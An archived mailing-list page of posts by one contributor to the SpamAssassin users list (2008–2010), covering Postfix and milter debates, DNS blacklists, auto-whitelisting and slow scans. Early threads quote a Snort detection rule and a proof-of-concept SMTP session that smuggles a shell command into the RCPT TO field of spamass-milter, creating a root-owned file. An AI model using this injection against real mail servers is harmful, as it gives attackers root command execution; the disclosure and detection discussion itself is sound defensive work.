Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 14:04 +0100, Yet Another Ninja wrote:
> to stay on the Postfix 'merry-go-round' for an answer, or we
> > can just agree Postfix can't easily do this and move on and stop
> > flogging this dead horse :-)
> 
> good idea -
> 
> Here, its totally off topic.
> 
> Move it to Postfix lists
> 
Better idea, just drop it! Postfix lacks features and it's a fair
statement.

There are enough arse lickers here without going to the Temple of Wietse
to visit the disciples without the socks.

Perhaps if people stopped kissing arse and grovelling so much Postfix
would have some sensible features - but that ain't gonna happen any time
soon.



Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 13:00 +, Robert Brooks wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 13:17 +0100, Ralf Hildebrandt wrote:
> >> * Brian :
> >>
> >>> In the year 2010 it is not unreasonable to expect the MTA that takes
> >>> responsibility for accepting a message to make reasonable checks about
> >>> the validity or content of that message. 
> >> Postfix can do this either via the milter interface OR the
> >> smtpd_proxy_filter
> >>
> >> It's very easy.
> >>
> 
> > So Ralf - author of 'The Postfix Book', can you please now tell me how
> > to get Postfix to reject mail before it accepts it and gives a 250 -
> > When Spamassassin tags it as spam? 
> 
> personally I use smtpd_proxy_filter to do EXACTLY this.

And without an external program.. ?

Clue 'YOU CAN'T'.



Re: Fwd: SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian
On Tue, 2010-03-09 at 02:36 -0700, LuKreme wrote:
> On 08-Mar-10 23:51, Brian wrote:
> > Yes, but that does not answer my question {and is once more Postfix
> > biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
> > Spamassassin decides IS SPAM without the aid of a milter or policy
> > daemon of some kind. Unless you know different?
> 
> You don't let messages even GET to SA until they pass sane checks (like 
> reject_non_fqdn_sender and reject_non_fqdn_recipient).

Which spam happily passes, hence the need for Spamassassin to do content
inspection - unless you are telling me Postfix can offer the same level
of content inspection as  Spamassassin? (Clue: stock answer - 'Postfix
is an MTA, it does not do..)
> 
> > Natively It can happily do it after accepting the mail (hint - a bit
> > late then...) with an after queue filter, but this is prone to the
> > phenomenon that is 'Postscatter' -sending the message back to the
> > (often) forged sender.
> 
> You never send back a spam that you accepted. You reject it, deliver it, 
> or discard it. *Never* bounce backscatter.
Which Postfix *CANNOT* do with Spamassassin *UNLESS* you use the milter.
Unless you know otherwise...
> 
> > Postfix, much that I love it, has some gaping holes in its feature set.
> 
> No, it really doesn't.
Yes it does, see above. Another example: header and body checks that
don't support any kind of whitelisting. No native support for DKIM, no
sensible native content filters.
> 
> > It really is an MTA for the 1990's. The need to bolt in a Sendmail
> > Milter to get it to reject Spamassassin tagged mail at the SMTP stage is
> > a glaring example IMHO - But all this is very much OT.
> 
> If you want milters, postfix has supported them for years. They are not 
> necessary in this case.
OK Lukreme. Tell me how you get Postfix to reject spam on content AT
SMTP TIME - NOT AFTER ACCEPTING IT when Spamassassin decides that it is
SPAM. Such a case where the incoming mail meets all other SMTP criteria
(has PTR, PTR rrdns matches, not listed on any RBL, is to a valid
recipient). Let's say, for the sake of simplicity, it matches a
Spamassassin body based metarule. How do you do this natively in Postfix
without the use of a Milter or Policy Daemon of some kind? I'd really
like to know.



Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 20:44 +, Ned Slider wrote:
> Brian wrote:
> >> That's Postfix 2.3.3 on RHEL5 BTW :-)
> >>
> >> $ rpm -q postfix
> >> postfix-2.3.3-2.1.el5_2.x86_64
> >>
> > Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
> > time without using the milter or something hideous like
> > Amavis-crashalot? Perhaps if they added some features to that old
> > dinosaur it would become a bit more useful as an MTA :-)
> > 
> > 
> 
> See this guide I've written:
> 
> http://wiki.centos.org/HowTos/postfix_restrictions
> 
> Specifically,
> 
> # /etc/postfix/main.cf
> # Recipient restrictions:
> smtpd_recipient_restrictions =
> reject_unknown_recipient_domain
> 
Yes, but that does not answer my question {and is once more Postfix
biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
Spamassassin decides IS SPAM without the aid of a milter or policy
daemon of some kind. Unless you know different? 

Natively It can happily do it after accepting the mail (hint - a bit
late then...) with an after queue filter, but this is prone to the
phenomenon that is 'Postscatter' -sending the message back to the
(often) forged sender. This is kind of ironic given how the Postfix
Posse bang on about 'not accepting' mail of criteria 'x'.

Postfix, much that I love it, has some gaping holes in its feature set.
It really is an MTA for the 1990's. The need to bolt in a Sendmail
Milter to get it to reject Spamassassin tagged mail at the SMTP stage is
a glaring example IMHO - But all this is very much OT.





Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian
> That's Postfix 2.3.3 on RHEL5 BTW :-)
> 
> $ rpm -q postfix
> postfix-2.3.3-2.1.el5_2.x86_64
> 
Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
time without using the milter or something hideous like
Amavis-crashalot? Perhaps if they added some features to that old
dinosaur it would become a bit more useful as an MTA :-)



Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 20:16 +, Ned Slider wrote:
> Brian wrote:
> > On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> >> just a heads up:  I don't know if there is a problem with SA milter, but 
> >> there is a snort signature for it now.
> >>
> >>
> >>  Original Message 
> >> Subject:   [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
> >> Arbitrary Command Injection Attempt
> >> Date:  Mon, 8 Mar 2010 13:03:52 +
> >> From:  Kevin Ross 
> >> To:emerging-s...@emergingthreats.net 
> >> , Matt Jonkman 
> >>
> >>
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
> >> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
> >> flow:established,to_server; content:"to|3A|"; nocase; 
> >> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; 
> >> reference:url,www.securityfocus.com/bid/38578; 
> >> reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)
> >>
> >> Kev
> >>
> > 
> > The key is this:
> > 
> > "If spamass-milter is run with the expand flag (-x option) it runs a
> > popen() including the attacker supplied 
> > recipient (RCPT TO)."
> > 
> > POC IS
> > 
> > $ nc localhost 25
> > 220 ownthabox ESMTP Postfix (Ubuntu)
> > mail from: me () me com
> > 250 2.1.0 Ok
> > rcpt to: root+:"|touch /tmp/foo"
> > 250 2.1.5 Ok
> > 
> > $ ls -la /tmp/foo
> > -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
> > 
> > 
> 
> Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
> 
> mail from: n...@example.com
> 250 2.1.0 Ok
> rcpt to: root+:"|touch /tmp/foo"
> 504 5.5.2 : Recipient address rejected: need 
> fully-qualified address
> quit
> 221 2.0.0 Bye
> Connection closed by foreign host.
> 
That's a Microsoft kind of answer if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on after thought for Postfix ;-)

It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}



Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> just a heads up:  I don't know if there is a problem with SA milter, but 
> there is a snort signature for it now.
> 
> 
>  Original Message 
> Subject:  [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
> Arbitrary Command Injection Attempt
> Date: Mon, 8 Mar 2010 13:03:52 +
> From: Kevin Ross 
> To:   emerging-s...@emergingthreats.net 
> , Matt Jonkman 
> 
> 
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
> flow:established,to_server; content:"to|3A|"; nocase; 
> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; 
> reference:url,www.securityfocus.com/bid/38578 
> ; 
> reference:url,seclists.org/fulldisclosure/2010/Mar/140 
> ; sid:1324412; rev:1;)
> 
> Kev
> 

The key is this:

"If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied 
recipient (RCPT TO)."

POC IS

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo



Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 12:41 +, Mike Cardwell wrote:
> On 08/03/2010 12:34, Brian wrote:
> 
> > Is zen.spamhous.org new? Personally I'd check your spelling ;-)
> 
> m...@haven:~$ host 1.0.0.127.zen.spamhous.org
> 1.0.0.127.zen.spamhous.org  A   208.73.210.27
> m...@haven:~$ host 1.2.3.4.zen.spamhous.org
> 1.2.3.4.zen.spamhous.orgA   208.73.210.27
> m...@haven:~$
> 
> Wonder how many people that has tripped up in its time.
I wonder if Claus at UCEProtect registered that? Two things make me
wonder. First, he is said to be a cyber-squatter, but the clincher for
me is using 'zen.spamhous.org' results in a positive return and high
false positive rate 
}}} GRIN 




Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Brian
Is zen.spamhous.org new? Personally I'd check your spelling ;-)



Re: How to find where email server has been blacklisted

2010-03-08 Thread Brian
On Mon, 2010-03-08 at 10:51 +0100, Mikael Syska wrote:
> Hi,
> 
> Then something is broken at your end ...
> 
> I see 4 icons ... timeout, listed, non-listed  and offline.
> 
> Or am I missing your point here ?

*HINT* Are you colour blind or normal sighted?



RE: which SA database to use

2010-01-08 Thread Brian Bebeau
 

> I have qmail running with the
> 
>  :allow,QMAILQUEUE="/usr/bin/qmail-spamc"
> 
> in /etc/tcp.smtp
> 
> I have some hams/spams that I want to run sa-learn against, but I
> can't figure out which database it is qmail filters through. Is it the
> db of the user "spamd", "root" or some qmail user account?
> Anyone running qmail with SA that could provide me with some insight
> that would be great.

If you're using the QMAILQUEUE env var, you're generally overriding the 
qmail-queue program, which usually is owned by user "qmailq". You can check
who owns /var/qmail/bin/qmail-queue (or wherever qmail-queue is) to see.



Re: giftcardsurveys.us.com

2009-08-13 Thread Brian Godette
Johnson, S wrote:
> I’ve done really good with blocking spam up until this one…
> 
> It looks like a “legitimate” e-mailer from both the system perspective
> and the system perspective.
> 
> When I look at my logs, the servers are reporting their domains
> correctly so their mailserver looks ok when attacking to my server. 
> Each email seems to be coming from numerous different servers so I can’t
> block on server address…
> 
> They say don’t do “spamming” but the area in the email that contains the
> link to remove yourself/unsubscribe is an image so you can’t click on
> it, instead you have to type it in by hand.  I normally don’t proceed
> down that path but I decided to try it anyway.  When I put in the email
> address of the user that was being sent these survey offers for gift
> cards I got a message stating please allow 10 days for removal which
> makes me think they are not legit.
> 
> The question is… Since everything is configured on their servers ok and
> the messages don’t contain words I can really create a rule on..  It’s
> not just home depot, it’s KFC, Macy’s and numerous other retailers. 
> Anyone have any ideas on how to block these?  The poor user is getting
> about 10 / day.
> 
> Thanks,
> 
>   Scott

Welcome to snowshoe spam.

The only effective defense I've seen against this is to have a greylist
with more than an hour temp fail time so each new spam run has time to
hopefully show up in DCC and possibly RAZOR/Pyzor/Spamcop/URIBL.

The content really can't be matched against since the URIs are old
enough to not be in something like DOB, haven't been used before so
aren't in the URIBLs, and look like real rebate/coupon mail so
BAYES/phrase matching is useless unless you want to nuke or manually
whitelist the legit stuff. The websites are of course a CC scam/PI phish.

You can block the servers, a class C or whois allocation at a time, if
you're willing to deal with the occasional "why am I not getting mail
from ABC who's decided to host with sleazy hosting XYZ" if the space
ever gets reassigned.


Re: Server overload, queuing for SA possible?

2009-03-25 Thread Brian J. Murrell
On Wed, 2009-03-25 at 15:01 -0400, Michael Scheidell wrote:
>  
> Match your MTA processes to the spamd children.  Your MTA will send 4xx
> 'busy now, come back to play later' message.  Let the sending MTA queue it
> back up (or zombies will just go away)

I don't really see that as a socially responsible action.  If my
mailserver was completely loaded to the point of not even being able to
queue a message, I'd buy pushing back on the sender with a 4xx, but the
reality is that while I may have maxed out my spamd children, I can
likely still receive and queue mail locally.

The queueing up of mail to spamd really belongs on the local server, and
should not become a burden on sending MTAs.

I'm kinda gathering that this is not possible within spamassassin
itself.  Probably in fact it is for at least some MTAs but how to
achieve it becomes MTA specific and OT here.

b.





RE: Server overload, queuing for SA possible?

2009-03-24 Thread Brian J. Murrell
On Tue, 2009-03-24 at 08:10 -0500, Bowie Bailey wrote:
> 
> Your assessment sounds right to me.  I would make two suggestions.
> 
> 1) Memory is cheap these days.  Add some more RAM.

That's a mitigation strategy, yes, but it doesn't really answer OP's
question about how to make spamd stop trying to allocate new incoming
spams to try to process them all at the time they come in and instead
put them into a queue, in a effort to try to "even" the load out.

> 2) Reduce the maximum children setting so that the system doesn't start
> swapping.  This will cause SA to scan faster and should result in fewer
> messages slipping through while SA is busy.

But it also means if the incoming load temporarily overruns the
available children currently available, then the excess doesn't get
spamd treatment.  Or does it?

If I have 5 spamd children available and (just to torture it) I fire off
50 spamc processes, what happens?

b.





Re: false positive on X-Mailer: Microsoft Outlook

2009-02-22 Thread Brian J. Murrell
On Sat, 21 Feb 2009 16:51:29 +0100, Karsten Bräckelmann wrote:
>  
> Sounds like bug 5962 and it's friends.
>   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=5962

Yeah, I read that one.  The fix that was pushed for that bug however does 
not include the __HOTMAIL_BAYDAV_MSGID pattern as an exclusion for 
__FORGED_OUTLOOK_DOLLARS.

> Hmm, that fix also landed in the 3.2 branch, and even has been pushed
> out to the updates. So it isn't that one?

No.  That fix still does not use the __HOTMAIL_BAYDAV_MSGID pattern to 
validate the __FORGED_OUTLOOK_DOLLARS test.

> Brian, can you please check bugzilla for similar reports [1],

That was a pretty vague search, hence all the hits.

> closed or
> still open, and file a new bug, if none of them is your issue?

Yeah, I don't see anything better than bug 5692.  So file a new bug.  
~sigh~  Yet another bugzilla account I have to create/manage.  I just get 
so tired of every website wanting me to register/log-in.  No openid 
support either.

Oh.  Seems there is already an account with my e-mail id.  I guess I 
already have one, but lord knows what the password is.  So now for the 
password recovery rigmarole.  Did I already express my displeasure with 
having to manage so many login accounts?  I guess that's what openid is 
supposed to deal with.  The plethora of accounts is out of hand now.

Anyway, when I get the password change token, I will file a new bug.  
Sorry for the whine.

Cheers,
b.




false positive on X-Mailer: Microsoft Outlook

2009-02-20 Thread Brian J. Murrell
Hi

I have a message in hand that is triggering false positives based on the 
ratware rules in 3.2.4.

The specific headers are:

Message-ID: 
X-Mailer: Microsoft Outlook, Build 10.0.6838

Specifically, it seems that the X-Mailer header matches 
__OUTLOOK_DOLLARS_MUA, and the Message-ID matches __HOTMAIL_BAYDAV_MSGID

The problem is that __OUTLOOK_DOLLARS_MUA is included in 
__FORGED_OUTLOOK_DOLLARS without an exception for __HOTMAIL_BAYDAV_MSGID 
so __FORGED_OUTLOOK_DOLLARS causes a hit on FORGED_MUA_OUTLOOK.

It seems to me, given this valid, non spam, non-ratware originating 
message, that __FORGED_OUTLOOK_DOLLARS needs to include an "&& !
__HOTMAIL_BAYDAV_MSGID" in the exception list.

Thots?

b.

P.S. I do see that trunk is handling this combination of headers in a 
fairly different manner.  But that doesn't change the fact that this MUA 
is causing false positives on 3.2, even with the latest (sa-
update_3.2_20081231172858 according to SVN) 3.2 update.



Re: excessive scan time

2009-01-22 Thread Brian J. Murrell
On Thu, 22 Jan 2009 12:37:09 +, Justin Mason wrote:

> you should definitely investigate ways to avoid doing NFS reads/writes
> of the bayes files -- that is extremely I/O intensive, and NFS deals
> with it very badly.

OK.  Noted.  Maybe I will push the bayes database into MySQL as 
previously suggested.

Thanx!

b.




Re: excessive scan time

2009-01-22 Thread Brian J. Murrell
On Thu, 22 Jan 2009 13:27:57 +0100, Jonas Eckerman wrote:
> 
> If you're not already using a SQL database for bayes and AWL I'd
> suggest you do that.

Those two I might be willing to consider, however...
 
> I'd also suggest using SQL for user preferences.

The user interface (i.e. editing a file) for user preferences is a 
different story.  Now users need to know how to edit SQL records, or I 
need to install a web interface for that.  The ROI here for that is just 
not high enough.

> With bayes, AWL and user prefs in a SQL database that problem ought to
> be avoided. (Maybe there's more than those that should be moved from
> ~/.spamassassin though).

Yeah.  I tend to doubt those are the real culprits.  I think I have 
identified a backup process on the same server that does the NFS and mail 
as being quite expensive in both disk and memory and it's probably what is 
contending with spamd processes for resources.

b.




profile the various tests being done

2009-01-21 Thread Brian J. Murrell
I'm trying to figure out why in some cases, spamd is taking in excess of 
1200s to process messages.  Is there any way to profile (i.e. time, or 
timestamp) each of the tests that spamd is doing so I can see where the 
longest ones are?

Even enabling the kind of debug that "spamassassin -D" produces, along 
with timestamps for each line of debug would be useful.

I've tried to use -D with spamd but I don't see any debug being logged 
anywhere (i.e. not in /var/log/mail.info along with the rest of spamd's 
log output).

Cheers,
b.



Can't locate object method "new" via package "Net::DNS::RR::TXT"

2009-01-20 Thread Brian J. Murrell
I seem to be getting a lot of these in the last 36h:


12:02:26 spamd Can't locate object method "new" via package "Net::DNS::RR::TXT" 
at /usr/lib/perl5/Net/DNS/RR.pm line 305.
12:02:26 spamd caught at /usr/share/perl5/Mail/SpamAssassin/DnsResolver.pm line 
419

Any ideas why?

b.



Re: excessive scan time

2009-01-19 Thread Brian J. Murrell
On Mon, 19 Jan 2009 16:47:24 +0100, Matus UHLAR - fantomas wrote:
>  
> When did you sa-update for last time?

Ubuntu appears to install a cron.daily cron job which does this amongst 
other things.

> How many processes are you running
> in parallel?

I have a pretty low volume system but I did just up it from 5 to 8 
yesterday.

> Aren't you running out of memory?

No.
 
>> a) determine why the scan time is so long, after the fact (i.e. I could
>>try to run the same spam through a "spamassassin -D [-t]" but there
>>is no guarantee that whatever took so long the first time through
>>will again take so long)?
> 
> try running spamassassin with -L option

How will -L (local tests only) help me determine which remote tests are 
taking so long?

>> b) reduce some timeouts of some particular tests so that the total test
>>time does not exceed a reasonable threshold?
> 
> razor,pyzor,dcc,spf,dkim,rbl have their timeouts (*_timeout), see their
> (or SpamAssassin) docs.

Indeed.  "dpkg -L spamassassin | xargs grep _timeout" shows some very 
interesting results.

Now that I think about it, I wonder if I am barking up the wrong tree.  
One thing worth noting is that I have spamassassin using ~/.spamassassin 
here and people's home dirs can be (i.e. NFS) mounted from remote 
machines (i.e. their primary workstations), which do occasionally get 
shut down.  I wonder what happens in the MTA->SA->local delivery process 
chain when ~/.spamassassin is unavailable, or worse, on a stale mount.

Is there a reasonable timeout built in to trying to read from that dir?

Thots?

b.




excessive scan time

2009-01-19 Thread Brian J. Murrell
I'm running 3.2.4(-1ubuntu1) of spamassassin here and have been noticing 
some excessive scan times.  i.e.:

Jan 18 19:07:28 linux spamd[30216]: spamd: result: Y 14 - 
AWL,BAYES_99,DCC_CHECK,DIGEST_MULTIPLE,HTML_IMAGE_ONLY_20,HTML_IMAGE_RATIO_06,HTML_MESSAGE,HTML_SHORT_LINK_IMG_3,MIME_HTML_ONLY,RAZOR2_CF_RANGE_51_100,RAZOR2_CF_RANGE_E8_51_100,RAZOR2_CHECK,RDNS_NONE,TVD_APPROVED,URIBL_BLACK
scantime=604.3,size=3325,user=brian,uid=1001,required_score=5.5,rhost=localhost,raddr=127.0.0.1,rport=49135,mid=<20090118234025.2fa951cc7...@66v.uwp30.udelmarva.com>,bayes=1.00,autolearn=spam

The result of this (604 second) scan time is that the MTA ends up giving 
up waiting after 600 seconds and the scan result is essentially wasted.  
No doubt some kind of "remote" test is taking an excessive amount of time.

How can I:

a) determine why the scan time is so long, after the fact (i.e. I could
   try to run the same spam through a "spamassassin -D [-t]" but there is
   no guarantee that whatever took so long the first time through will
   again take so long)?
b) reduce some timeouts of some particular tests so that the total test
   time does not exceed a reasonable threshold?

Thanx,
b.
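Added example, not code from SpamAssassin or from anyone in this thread: a small parser for spamd "result:" lines like the one quoted above that answers question (a) after the fact from the log alone. It lists scans that exceeded the MTA's 600-second limit and ranks rules by how much slower the messages hitting them were than the rest, so a stalled network test (Razor, DCC, URIBL) stands out without re-running the message. The log lines are constructed for this example, modelled on the line in the message; the field layout they assume is the one visible there.

```python
import re
from statistics import mean

# spamd 3.2 "result:" line; layout taken from the line quoted above. The score is
# printed with %2d, hence \s+ between the flag and the score.
RESULT_RE = re.compile(
    r"spamd\[(?P<pid>\d+)\]: spamd: result: (?P<flag>[Y.])\s+(?P<score>-?\d+) -\s+"
    r"(?P<rules>(?:[A-Za-z0-9_]+(?:,[A-Za-z0-9_]+)*)?)\s*"
    r"scantime=(?P<scantime>[\d.]+),size=(?P<size>\d+),user=(?P<user>[^,]+)"
)


def parse_result_line(line):
    """Return a dict for a result line, or None for any other spamd line."""
    m = RESULT_RE.search(line)
    if not m:
        return None
    return {
        "pid": int(m["pid"]),
        "spam": m["flag"] == "Y",
        "score": int(m["score"]),
        "rules": m["rules"].split(",") if m["rules"] else [],
        "scantime": float(m["scantime"]),
        "size": int(m["size"]),
        "user": m["user"],
    }


def parse_log(lines):
    return [r for r in (parse_result_line(ln) for ln in lines) if r]


def slow_scans(records, threshold):
    """Scans the MTA would have given up on (threshold in seconds)."""
    return [r for r in records if r["scantime"] > threshold]


def rule_scantime_delta(records, min_hits=2):
    """For each rule hit by at least min_hits messages: mean scantime of the
    messages that hit it minus mean scantime of those that did not, highest
    first. A rule that only fires on slow scans is the one to look at."""
    out = {}
    for rule in {rule for r in records for rule in r["rules"]}:
        hit = [r["scantime"] for r in records if rule in r["rules"]]
        miss = [r["scantime"] for r in records if rule not in r["rules"]]
        if len(hit) >= min_hits and miss:
            out[rule] = mean(hit) - mean(miss)
    return sorted(out.items(), key=lambda kv: kv[1], reverse=True)


# Constructed sample log (not real traffic); message-ids are placeholders.
SAMPLE_LOG = [
    "Jan 18 19:07:28 linux spamd[30216]: spamd: result: Y 14 - "
    "AWL,BAYES_99,DCC_CHECK,DIGEST_MULTIPLE,HTML_MESSAGE,RAZOR2_CHECK,URIBL_BLACK "
    "scantime=604.3,size=3325,user=brian,uid=1001,required_score=5.5,rhost=localhost,"
    "raddr=127.0.0.1,rport=49135,mid=<c1@example.invalid>,bayes=1.00,autolearn=spam",
    "Jan 18 19:08:02 linux spamd[30217]: spamd: result: . -2 - BAYES_00,HTML_MESSAGE "
    "scantime=2.1,size=4120,user=brian,uid=1001,required_score=5.5,rhost=localhost,"
    "raddr=127.0.0.1,rport=49140,mid=<c2@example.invalid>,bayes=0.00,autolearn=ham",
    "Jan 18 19:08:02 linux spamd[30217]: spamd: clean message (-2.0/5.5) for brian:1001 "
    "in 2.1 seconds, 4120 bytes.",
    "Jan 18 19:13:40 linux spamd[30218]: spamd: result: Y  9 - BAYES_50,RAZOR2_CHECK "
    "scantime=310.0,size=2210,user=brian,uid=1001,required_score=5.5,rhost=localhost,"
    "raddr=127.0.0.1,rport=49151,mid=<c3@example.invalid>,bayes=0.50,autolearn=no",
    "Jan 18 19:13:44 linux spamd[30216]: spamd: result: . -1 - BAYES_00 "
    "scantime=1.5,size=980,user=brian,uid=1001,required_score=5.5,rhost=localhost,"
    "raddr=127.0.0.1,rport=49160,mid=<c4@example.invalid>,bayes=0.00,autolearn=ham",
    "Jan 18 19:13:51 linux spamd[30217]: spamd: result: .  1 - BAYES_50,DCC_CHECK "
    "scantime=3.4,size=15200,user=brian,uid=1001,required_score=5.5,rhost=localhost,"
    "raddr=127.0.0.1,rport=49162,mid=<c5@example.invalid>,bayes=0.50,autolearn=no",
]

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for r in slow_scans(recs, 600):
        print(f"pid {r['pid']} user {r['user']} scantime {r['scantime']}s")
    for rule, delta in rule_scantime_delta(recs)[:3]:
        print(f"{rule:15s} +{delta:.1f}s when hit")
```

Feed it real /var/log/mail.info lines with parse_log(open(path)); the minimum-hits cutoff exists because a rule that fired on one message tells you nothing about the rule, only about that message.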



Re: skew the AWL on spam report

2008-12-04 Thread Brian J. Murrell
On Thu, 2008-12-04 at 22:38 -0500, Matt Kettler wrote:
> 

To follow-up on this suggestion...

> That said, why add code to sa-learn when spamassassin can already do
> something even more complete. Try feeding the message "spamassassin -r
> --add-to-blacklist".

It seems (looking at -D output) that spamassassin won't do both of those
in the same invocation.  If I put both the "-r" and "--add-to-blacklist"
options on the command-line, it only does the latter.  If I leave off
the latter command line, it goes ahead and reports the spams to the
various digest databases.

b.





Re: skew the AWL on spam report

2008-12-04 Thread Brian J. Murrell
On Thu, 2008-12-04 at 22:38 -0500, Matt Kettler wrote:
>
> That said, why add code to sa-learn when spamassassin can already do
> something even more complete. Try feeding the message "spamassassin -r
> --add-to-blacklist".

Ahhh.  I was mistakenly thinking that sa-learn == [ update-bayes
database + what spamassassin -r does ].

> Provided you haven't disabled bayes_learn_during_report, the -r will
> cause bayes learning as spam. As a bonus it will also report the message
> to spamcop and razor, pyzor, etc if you have them installed.

Sweet.  Thanx!  Your solution is perfectly reasonable.

b.





Re: skew the AWL on spam report

2008-12-04 Thread Brian J. Murrell
On Thu, 2008-12-04 at 18:35 -0500, Matt Kettler wrote:
> 
> ie: you
> can't tell sa-learn a message is spam and have it apply that information
> in any way to the AWL.  I guess that's really what my point was, and I
> expressed it poorly.

I guess as the OP of this thread, my point was that why shouldn't
sa-learn skew up the (existing) scores in the AWL when it is given a
spam to learn?  IOW, if an entry in the AWL doesn't already exist, don't
add one but if there is a matching entry, skew its scoring to ensure
that the next time it's used for this sender, it adds to the spamminess
score, not subtracts from it.

I have come to understand via this thread that the
"--add-addr-to-blacklist" (or is it more correctly
"--add-to-blacklist"?) argument effectively does that, adding a "fake"
entry to the AWL representing a spam scored at 100 points.

My proposal would be to roll up this "--add-to-blacklist" spamassassin
argument into sa-learn --ham with the exception of only modifying an
existing entry, not creating new ones.

b.





skew the AWL on spam report

2008-12-02 Thread Brian J. Murrell
If I get a spam and I need to have SA learn that it's spam with
sa-learn, wouldn't it be useful to also skew the AWL for that sender so
that future uses of the AWL for that spammer will push the overall spam
score up?

Thots?

b.





RE: why is SA testing my server in DNSBLs?

2008-12-02 Thread Brian J. Murrell
On Tue, 2008-12-02 at 17:17 -0500, Rosenbaum, Larry M. wrote:
> 
> The checks it's doing below are all RHBL checks, so it's probably testing the 
> Return-Path:.

Indeed, this was the case.  What's even better is that is only for the
case where I test out of my mailbox as that Return-Path: is only added
(in replacement) by local delivery.  Actual production testing of
incoming mail would have used the Return-Path: added by my receiving
MTA.

Thanx for the info!

b.





why is SA testing my server in DNSBLs?

2008-12-02 Thread Brian J. Murrell
Hi All,

I was doing a bit of "spamassassin -D" testing with SA 3.2.4 and noticed
that it's running my own mail server name through various DNSBL tests.  

Here are the headers of the particular message I am testing:

From [EMAIL PROTECTED] Tue Dec  2 05:24:59 2008
Return-Path: <[EMAIL PROTECTED]>
X-Sieve: CMU Sieve 2.2
X-Original-To: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Received: from johnstonsz.net (unknown [64.86.206.149]) by
 linux.interlinx.bc.ca (Postfix) with ESMTP id E0F4A86FF for
 <[EMAIL PROTECTED]>; Tue,  2 Dec 2008
 05:24:55 -0500 (EST)
Received: by johnstonsz.net (Postfix) with SMTP id 1C89413122ED for
 <[EMAIL PROTECTED]>; Tue,  2 Dec 2008
 05:25:54 -0500 (EST)
Subject: Shop On us - 1000 Wal-Mart GiftCard!
From: SamplePacks<[EMAIL PROTECTED]>
Reply-to: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Priority: 5
X-Mailer: AlphaPlus 
Content-Type: text/html; charset=us-ascii;
Content-Disposition: inline
Message-Id: <[EMAIL PROTECTED]>
Date: Tue,  2 Dec 2008 05:25:54 -0500 (EST)
X-Evolution-Source: imap://[EMAIL PROTECTED]/
Content-Transfer-Encoding: 8bit
Mime-Version: 1.0

Here's the relevant bits of the SA debug:

[29986] dbg: received-header: parsed as [ ip=64.86.206.149 rdns= 
helo=johnstonsz.net by=linux.interlinx.bc.ca ident= envfrom= intl=0 
id=E0F4A86FF auth= msa=0 ]
[29986] dbg: received-header: relay 64.86.206.149 trusted? no internal? no msa? 
no
[29986] dbg: metadata: X-Spam-Relays-Trusted: 
[29986] dbg: metadata: X-Spam-Relays-Untrusted: [ ip=64.86.206.149 rdns= 
helo=johnstonsz.net by=linux.interlinx.bc.ca ident= envfrom= intl=0 
id=E0F4A86FF auth= msa=0 ]
[29986] dbg: metadata: X-Spam-Relays-Internal: 
[29986] dbg: metadata: X-Spam-Relays-External: [ ip=64.86.206.149 rdns= 
helo=johnstonsz.net by=linux.interlinx.bc.ca ident= envfrom= intl=0 
id=E0F4A86FF auth= msa=0 ]

So it seems that the "by linux.interlinx.bc.ca" specification of what
should be the first "trusted" Received: header is being used later in
DNSBL tests:

[29986] dbg: dns: launching DNS A query for 
linux.interlinx.bc.ca.rhsbl.ahbl.org. in background
[29986] dbg: async: starting: DNSBL-A, 
dns:A:linux.interlinx.bc.ca.rhsbl.ahbl.org. (timeout 15.0s, min 3.0s)
[29986] dbg: dns: checking A and MX for host linux.interlinx.bc.ca
